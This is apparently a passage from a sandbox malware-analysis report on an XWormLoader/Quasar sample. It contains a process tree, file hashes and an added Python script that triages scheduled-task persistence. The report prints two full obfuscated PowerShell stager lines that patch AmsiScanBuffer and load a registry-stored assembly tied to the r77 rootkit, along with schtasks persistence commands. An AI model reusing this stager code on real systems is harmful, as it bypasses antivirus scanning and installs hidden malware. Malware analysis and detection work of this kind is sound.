0,[ref]$KfifdtTYcK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OF'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'s'+[Char](116)+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:axNCrTzuDeWo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lVCxHtFrjlkTWl,[Parameter(Position=1)][Type]$OMGUoTknDe)$gZSQTHpiWsu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'le',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+'s,'+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'e'+'a'+'le'+'d'+''+','+'A'+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$gZSQTHpiWsu.DefineConstructor(''+'R'+'T'+'S'+''+'p'+'e'+'c'+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+'id'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lVCxHtFrjlkTWl).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+'i'+[Char](109)+''+'e'+''+','+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$gZSQTHpiWsu.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+'u'+'b'+'l'+'i'+[Char](99)+','+[Char](72)+'id'+'e'+'By'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+'l',$OMGUoTknDe,$lVCxHtFrjlkTWl).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me'+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');Write-Output $gZSQTHpiWsu.CreateType();}$bXwhHPsHFYlhh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+'s'+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+'2'+'.U'+'n'+''+'s'+'a'+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$EAdbJeCTXeSHWO=$bXwhHPsHFYlhh.GetMethod(''+[Char](71)+'e'+'t'+'P'+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BUgSiZzHoHJytiRfYQU=axNCrTzuDeWo @([String])([IntPtr]);$qjcFnZPXbmNEKbXFgElzTo=axNCrTzuDeWo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rFILPCHdADp=$bXwhHPsHFYlhh.GetMethod('G'+'e'+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'leH'+'a'+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'nel'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$hxjtumdjJOCnfW=$EAdbJeCTXeSHWO.Invoke($Null,@([Object]$rFILPCHdADp,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$dKeorIkmebIeIrkxV=$EAdbJeCTXeSHWO.Invoke($Null,@([Object]$rFILPCHdADp,[Object](''+[Char](86)+'i'+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$fNmpjDQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxjtumdjJOCnfW,$BUgSiZzHoHJytiRfYQU).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$cFGcReAVZDtCULlRX=$EAdbJeCTXeSHWO.Invoke($Null,@([Object]$fNmpjDQ,[Object]('A'+'m'+'s'+'i'+'S'+[Char](99)+'a'+[Char](110)+'Bu'+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$QyhVTadAew=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dKeorIkmebIeIrkxV,$qjcFnZPXbmNEKbXFgElzTo).Invoke($cFGcReAVZDtCULlRX,[uint32]8,4,[ref]$QyhVTadAew);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cFGcReAVZDtCULlRX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dKeorIkmebIeIrkxV,$qjcFnZPXbmNEKbXFgElzTo).Invoke($cFGcReAVZDtCULlRX,[uint32]8,0x20,[ref]$QyhVTadAew);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'WA'+'R'+''+'E'+'').GetValue('$'+[Char](55)+'7'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Discord\Discord.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "Discord" /f5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9kfq0615SnBy.bat" "5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost6⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3592 -s 3846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3592 -s 3926⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Discord.exe" /tr "'C:\Users\Admin\AppData\Roaming\Discord\Discord.exe'" /sc onlogon /rl HIGHEST5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77svchost.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\svchost.exe'" /sc onlogon /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 9004⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4492 -ip 44922⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3592 -ip 35922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3592 -ip 35922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
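Persistence in this run is scheduled-task based (ATT&CK T1053.005): the dropped Quasar binary registers itself as "Discord" with /sc ONLOGON and /rl HIGHEST from a user-profile path, and install.exe registers two more tasks whose names start with "$77". That prefix, like the "$77stager" registry value the PowerShell stager reads, is the naming convention of the r77 rootkit, which hides tasks, files, processes and registry entries whose names begin with "$77", so the prefix is itself a strong indicator. The Python below is an added triage example, not part of the report: it parses schtasks command lines of the shape seen in the tree and flags the persistence traits. SAMPLE_CMDLINES is constructed from the five invocations above; the directory and binary-name lists are my own choices.

```python
"""Triage schtasks command lines for persistence traits of the kind seen in
the process tree (ONLOGON trigger, HIGHEST run level, user-writable target,
"$77" name prefix, system binary name outside C:\\Windows).
Added example, not code from the report or the sample."""
import re
from dataclasses import dataclass, field

# Directories a standard user can write to; a logon task pointing here is
# user-level persistence, not a legitimate system job.  (Assumed list.)
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\users\\public\\", "\\programdata\\")
# Names of Windows binaries that should only ever run from C:\Windows.  (Assumed list.)
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe", "conhost.exe"}


@dataclass
class Task:
    action: str            # create / delete / change
    name: str = ""         # /tn
    target: str = ""       # /tr with the surrounding single quotes removed
    schedule: str = ""     # /sc, upper-cased
    run_level: str = ""    # /rl, upper-cased
    flags: list = field(default_factory=list)


# Tokeniser: a double-quoted argument (quotes dropped) or a bare word.
ARG = re.compile(r'"([^"]*)"|(\S+)')


def parse_schtasks(cmdline: str) -> Task:
    toks = [m.group(1) if m.group(1) is not None else m.group(2)
            for m in ARG.finditer(cmdline)]
    action = next((t[1:].lower() for t in toks
                   if t.lower() in ("/create", "/delete", "/change")), "")
    task = Task(action=action)
    for key, val in zip(toks, toks[1:]):
        key = key.lower()
        if key == "/tn":
            task.name = val
        elif key == "/tr":
            task.target = val.strip("'")   # install.exe wraps the path in '...'
        elif key == "/sc":
            task.schedule = val.upper()
        elif key == "/rl":
            task.run_level = val.upper()
    return task


def triage(task: Task) -> list:
    """Return the persistence traits of a /create call (empty for other actions)."""
    flags = []
    if task.action != "create":
        return flags
    low = task.target.lower()
    if task.schedule == "ONLOGON":
        flags.append("logon-triggered")
    if task.run_level == "HIGHEST":
        flags.append("runs with highest privileges")
    if any(d in low for d in USER_WRITABLE):
        flags.append("target in user-writable directory")
    if task.name.startswith("$77"):
        flags.append("$77 name prefix")
    if low.rsplit("\\", 1)[-1] in SYSTEM_NAMES and not low.startswith("c:\\windows\\"):
        flags.append("system binary name outside C:\\Windows")
    return flags


def report(cmdlines) -> list:
    """Parse every line, keep the /create calls, and attach their findings."""
    out = []
    for line in cmdlines:
        task = parse_schtasks(line)
        if task.action == "create":
            task.flags = triage(task)
            out.append(task)
    return out


# Constructed sample: the five schtasks invocations from the process tree.
TEMP_SVCHOST = r"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
ROAMING_DISCORD = r"C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"
SAMPLE_CMDLINES = [
    f'"schtasks" /create /tn "Discord" /sc ONLOGON /tr "{TEMP_SVCHOST}" /rl HIGHEST /f',
    f'"schtasks" /create /tn "Discord" /sc ONLOGON /tr "{ROAMING_DISCORD}" /rl HIGHEST /f',
    '"schtasks" /delete /tn "Discord" /f',
    f'"SCHTASKS.exe" /create /tn "$77Discord.exe" /tr "\'{ROAMING_DISCORD}\'" /sc onlogon /rl HIGHEST',
    f'"SCHTASKS.exe" /create /tn "$77svchost.exe" /tr "\'{TEMP_SVCHOST}\'" /sc onlogon /rl HIGHEST',
]

if __name__ == "__main__":
    for t in report(SAMPLE_CMDLINES):
        print(f"{t.name:16} -> {t.target}\n    {', '.join(t.flags)}")
```

On a live host the same logic applies to the "Task Scheduler task created" events (Security 4698) or to the XML under C:\Windows\System32\Tasks; note that once r77 is installed the "$77" tasks are hidden from schtasks /query and from the Task Scheduler UI on that host, so the registration event and the on-disk XML are the reliable sources.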
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.56898347-c3a7-440d-aef2-84c3787c9373.tmp.csv
Filesize: 36KB
MD5: 42831c77cd8fe5482dd157b98fba2ad3
SHA1: 49ada71a641942b425d428ccbb586bd82e3adc25
SHA256: bec797bf4ee01cb85e6b28d9dd441f83f88632a80d6be5e1dfab0e767fb9b869
SHA512: 576d442cfc13b18f9f78a0e3ed2e6af5f746d8dc5722aab2afd4521b55adacbdf11fde491a305d6b756c6dca60be6715be87dd2aff54f0e93a483ff760c39a48
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6aac17cc-d02f-4b14-9c6e-f94d750901d1.tmp.txt
Filesize: 13KB
MD5: 48844630c4e4b04142c185ead67eb0c4
SHA1: ded0f6c4a547e11dd328678de5fa55aaa9162b53
SHA256: 28ba7090eaee7f29c06f6de25c65dda0be3a3c8ecdd93bc6cbf6613522e18b9b
SHA512: 4e4b324b65a7823345b7ad9d2c99383d85f561e6b91fad2794f073cb7c00fe17f0293a23a8c59a7bed919644fcf26248516ad7963bac75bd95f600dd30d61e86
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.997871a2-18a6-40ea-9ff9-861a991059f5.tmp.txt
Filesize: 13KB
MD5: cdbea659e9ce03ce7fb4b26e88aff8de
SHA1: 8d22fc2c66c929b22f3d7e47b885361cde652a27
SHA256: ab1aab9e09ba11f36b7b93b8f209c0c7b6e30bf2c4c2c3ff463f6cea4e2efd2f
SHA512: 9fb54bc925e69a9973b5f1a96d7325c5235273a96f4f7bb33819ba5d9815ca67aed034c2dca5cf74ca04cf173b510c8da97bd9bce63bac6829b81fee26d9dbce
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.e4bf102d-117d-43a7-8849-e159705d68cb.tmp.csv
Filesize: 36KB
MD5: 3b2022e46d79bc869e71c531a7f3d951
SHA1: 3a33a7b65b5bf34a4e021dea2658f7c6ea949045
SHA256: 1f61ea8a795912b92f5e2f6134158d9af58f0e23feaf3b24a46fe8231bdf7b15
SHA512: 9bd8364bf175032a0f727a361a7da1367cc9d243f631eeded0a12865eca7f81f163258c49e9689c4e696e55ddda9c59ae6c3be1b6384a5f768df5b887bd758dc
-
C:\Users\Admin\AppData\Local\Temp\9kfq0615SnBy.bat
Filesize: 264B
MD5: 397e18286bfb5f61ccc38d1821f8c907
SHA1: 2b3391a9f37b94bf0a8ff5f9dab7efb2e655db8f
SHA256: 180920884b98cd076c3f593ded1f7a9b7e6960b7e32c5e719004140bcf6d4ede
SHA512: 41adeabbdc89114d6ab660699f1877d8860f186a8d47e38f9d5e7fc171c1ece2a20342c4a593c2cee5d4eb53b35de5d7255a459edb7b149c5449325f31652f7b
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe
Filesize: 109KB
MD5: f3b2ec58b71ba6793adcc2729e2140b1
SHA1: d9e93a33ac617afe326421df4f05882a61e0a4f2
SHA256: 2d74eb709aea89a181cf8dfcc7e551978889f0d875401a2f1140487407bf18ae
SHA512: 473edcaba9cb8044e28e30fc502a08a648359b3ed0deba85e559fe76b484fc8db0fc2375f746851623e30be33da035cec1d6038e1fcf4842a2afb6f9cd397495
-
C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize: 162KB
MD5: 152e3f07bbaf88fb8b097ba05a60df6e
SHA1: c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256: a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA512: 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe
Filesize: 409KB
MD5: 61e7a9eaef04c1617ffff35c0287d234
SHA1: 5a6ffedd75ac4e07594ccb6974ee8684d5128a35
SHA256: b2b4be7ae20431c88115d561a6886f22ab3416595338e7e2eb361f0bb428b987
SHA512: 8ee9fd8d8631dd611ff539fc35ad4c26f7bfb4b8a26de12e03f48f3b87a7f18198c37ec187a1e8393aafb88e468e74c734cafcaf72f73b0afc55822762d767e6
-
C:\Windows\Temp\__PSScriptPolicyTest_y4z5e25b.fwl.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize: 2KB
MD5: 5f4c933102a824f41e258078e34165a7
SHA1: d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256: d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512: a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: bb7d9cd87343b2c81c21c7b27e6ab694
SHA1: 27475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256: b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512: bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b
-
memory/396-55-0x0000000006E80000-0x0000000006E8A000-memory.dmp
Filesize: 40KB
-
memory/420-105-0x000001D989000000-0x000001D98902B000-memory.dmp
Filesize: 172KB
-
memory/420-112-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmp
Filesize: 64KB
-
memory/420-111-0x000001D989000000-0x000001D98902B000-memory.dmp
Filesize: 172KB
-
memory/456-116-0x00000194FEF70000-0x00000194FEF9B000-memory.dmp
Filesize: 172KB
-
memory/640-70-0x000002331C250000-0x000002331C275000-memory.dmp
Filesize: 148KB
-
memory/640-71-0x000002331C280000-0x000002331C2AB000-memory.dmp
Filesize: 172KB
-
memory/640-72-0x000002331C280000-0x000002331C2AB000-memory.dmp
Filesize: 172KB
-
memory/640-79-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmp
Filesize: 64KB
-
memory/640-78-0x000002331C280000-0x000002331C2AB000-memory.dmp
Filesize: 172KB
-
memory/708-83-0x0000024CE3800000-0x0000024CE382B000-memory.dmp
Filesize: 172KB
-
memory/708-90-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmp
Filesize: 64KB
-
memory/708-89-0x0000024CE3800000-0x0000024CE382B000-memory.dmp
Filesize: 172KB
-
memory/996-94-0x0000023CC8DA0000-0x0000023CC8DCB000-memory.dmp
Filesize: 172KB
-
memory/996-100-0x0000023CC8DA0000-0x0000023CC8DCB000-memory.dmp
Filesize: 172KB
-
memory/996-101-0x00007FF82DCF0000-0x00007FF82DD00000-memory.dmp
Filesize: 64KB
-
memory/1368-0-0x00007FF84CE13000-0x00007FF84CE15000-memory.dmp
Filesize: 8KB
-
memory/1368-723-0x00007FF84CE10000-0x00007FF84D8D2000-memory.dmp
Filesize: 10.8MB
-
memory/1368-24-0x00007FF84CE10000-0x00007FF84D8D2000-memory.dmp
Filesize: 10.8MB
-
memory/1368-1-0x0000000000ED0000-0x0000000000F28000-memory.dmp
Filesize: 352KB
-
memory/1612-56-0x0000014ED4E20000-0x0000014ED4E4A000-memory.dmp
Filesize: 168KB
-
